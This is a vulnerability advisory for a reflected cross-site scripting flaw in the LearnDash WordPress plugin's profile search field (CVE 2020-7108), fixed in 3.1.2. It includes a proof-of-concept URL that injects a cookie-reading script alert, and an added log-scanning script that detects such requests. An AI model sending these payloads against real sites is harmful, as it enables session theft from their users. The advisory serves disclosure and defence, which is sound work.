LearnDash < 3.1.2 - Reflected Cross Site Scripting (XSS) issue on the [ld_profile] search field.



Description
A reflected cross-site scripting (XSS) issue exists in the [ld_profile] search field.

First reported to LearnDash on January 14, 2020; update 3.1.2, which fixes the issue, was released the same day.

This report is based on an email LearnDash sent out to their users on January 14, 2020.

Proof of Concept
From the Original Researcher (Jinson Varghese Behanan, @JinsonCyberSec):

[wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E
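
Site owners can check whether requests matching this pattern reached their site by scanning web access logs for markup in the ld-profile-search parameter. The script below is an added example, not part of the original advisory or of LearnDash's code; the combined log format, the /my-account/ path and the sample log lines are constructed assumptions.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

PARAM = "ld-profile-search"  # query parameter named in the proof of concept
# Characters that let a reflected value leave HTML text or a quoted attribute.
MARKUP = re.compile(r'[<>"]')
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries; addresses are from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jan/2020:10:01:02 +0000] '
    '"GET /my-account/?ld-profile-search=algebra+101 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [15/Jan/2020:10:02:30 +0000] '
    '"GET /my-account/?ld-profile-search=O%27Brien HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Jan/2020:10:03:44 +0000] '
    '"GET /my-account/?ld-profile-search=%3Cscript%3Ealert(document.cookie)'
    '%3C/script%3E HTTP/1.1" 200 5244',
    '192.0.2.33 - - [15/Jan/2020:10:05:00 +0000] '
    '"GET /courses/?s=%3Cb%3E HTTP/1.1" 200 900',
]


def suspicious_requests(lines):
    """Return (client, decoded value, output-encoded value) for each request
    whose ld-profile-search parameter decodes to HTML markup."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if not match:
            continue  # not a recognisable request line
        query = urlsplit(match.group(1)).query
        # parse_qs percent-decodes values and keeps repeated parameters.
        for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
            if MARKUP.search(value):
                client = line.split()[0]
                # html.escape shows the value as inert text, which is how a
                # reflected search term should be written back into a page.
                hits.append((client, value, html.escape(value)))
    return hits


if __name__ == "__main__":
    for client, raw, encoded in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent {raw!r}; safe to display as {encoded!r}")
```

Only the third sample entry is reported: the plain search terms contain no markup, and the fourth request carries markup in a different parameter.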

Affects Plugin

Fixed in version 3.1.2

References

CVE 2020-7108
URL https://learndash.releasenotes.io/release/uCskc-version-312
URL https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/
URL https://www.jinsonvarghese.com/reflected-xss-in-learndash-wordpress-plugin/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Jinson Varghese Behanan (@JinsonCyberSec)
Submitter Andrew Wilder
Submitter Website https://www.nerdpress.net
Submitter Twitter @nerdpress
Verified No
WPVDB ID 10026

Timeline

Publicly Published 2020-01-15 (3 months ago)
Added 2020-01-15 (3 months ago)
Last Updated 2020-01-17 (3 months ago)
